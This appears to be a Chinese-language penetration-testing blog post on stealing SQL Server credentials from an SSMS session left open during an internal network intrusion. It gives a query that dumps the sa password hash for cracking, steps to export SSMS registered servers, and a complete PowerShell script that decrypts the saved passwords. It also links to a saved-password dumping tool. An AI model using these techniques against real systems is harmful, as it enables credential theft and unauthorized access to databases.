三種方式獲取SSMS鏈接密碼

內網滲透是有的時候會遇到對方SSMS沒斷開鏈接正連着別的機器的mssql此時有兩種方法能夠獲取sa密碼

當密碼強度較弱時可使用第一隻方式，第一種方式解不開的狀況下可使用後面二種方式

1.直接查詢sa密碼hash

使用以下語句：

Select master.dbo.fn_varbintohexstr(password_hash) from sys.sql_logins where name = 'sa'

直接獲得sa密碼hash

上cmd5解密

2.使用SSMS的註冊導出功能

右鍵點擊，而後選擇註冊

點擊保存

點擊識圖而後點擊已註冊服務器

而後右鍵選擇任務，而後導出

這個記得別勾，點肯定

而後使用powershell腳本解密

param( [Parameter(Mandatory=$true)] [string] $FileName ) Add-Type -AssemblyName System.Security $ErrorActionPreference = 'Stop' function Unprotect-String([string] $base64String) { return [System.Text.Encoding]::Unicode.GetString([System.Security.Cryptography.ProtectedData]::Unprotect([System.Convert]::FromBase64String($base64String ), $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser)) } $document = [xml] (Get-Content $FileName) $nsm = New-Object 'System.Xml.XmlNamespaceManager' ($document.NameTable) $nsm.AddNamespace('rs', 'http://schemas.microsoft.com/sqlserver/RegisteredServers/2007/08') $attr = $document.DocumentElement.GetAttribute('plainText') if ($attr -ne '' -and $Operation -ieq 'Decrypt') { throw "The file does not contain encrypted passwords." } $servers = $document.SelectNodes("//rs:RegisteredServer", $nsm) foreach ($server in $servers) { $connString = $server.ConnectionStringWithEncryptedPassword.InnerText echo "" echo "Encrypted Connection String:" echo $connString echo "" if ($connString -inotmatch 'password="?([^";]+)"?') {continue} $password = $Matches[1] $password = Unprotect-String $password echo "" echo "Decrypted Connection String:" $connString = $connString -ireplace 'password="?([^";]+)"?', "password=`"$password`"" echo $connString echo "" } 

3.導出SSMS記住的密碼

http://www.zcgonvh.com/post/SQL_Server_Management_Studio_saved_password_dumper.html

https://github.com/zcgonvh/SSMSPwd